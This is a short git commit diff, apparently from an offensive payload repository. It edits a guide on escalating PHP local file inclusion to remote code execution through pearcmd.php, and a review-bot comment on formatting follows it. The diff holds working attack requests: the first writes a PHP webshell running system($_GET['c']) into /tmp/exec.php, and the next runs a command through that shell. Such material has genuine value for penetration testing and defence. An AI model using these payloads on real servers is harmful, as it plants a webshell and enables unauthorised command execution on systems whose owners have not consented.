Add two methods about LFI to RCE via PHP PEARCMD, and delete extra double quotes in method 2 payload

Str3am 2023-11-01 00:35:59 +08:00 committed by GitHub
parent 072cac04d6
commit 95a85b455d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -516,7 +516,7 @@ There are this ways to exploit it.
```
* Method 2: man_dir
```ps1
/vuln.php?file=/usr/local/lib/php/pearcmd.php&+-c+/tmp/exec.php+-d+man_dir=<?echo(system($_GET['c']));?>+-s+"
/vuln.php?file=/usr/local/lib/php/pearcmd.php&+-c+/tmp/exec.php+-d+man_dir=<?echo(system($_GET['c']));?>+-s+
/vuln.php?file=/tmp/exec.php&c=id
```
The created configuration file contains the webshell.
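Review bot: The fence around the Method 2 lines is tagged `ps1`, but the three lines are URL request paths rather than PowerShell, so an untagged fence (or `text`) would avoid misleading syntax highlighting. The only edit visible in this hunk is dropping the trailing `"` after `-s+` on the first request line, while the commit message also says two methods are added; if those additions are not in other hunks, the message should be narrowed to the quote fix. The closing sentence would read more clearly if it named the file it refers to, which from the `-c` argument above is `/tmp/exec.php`.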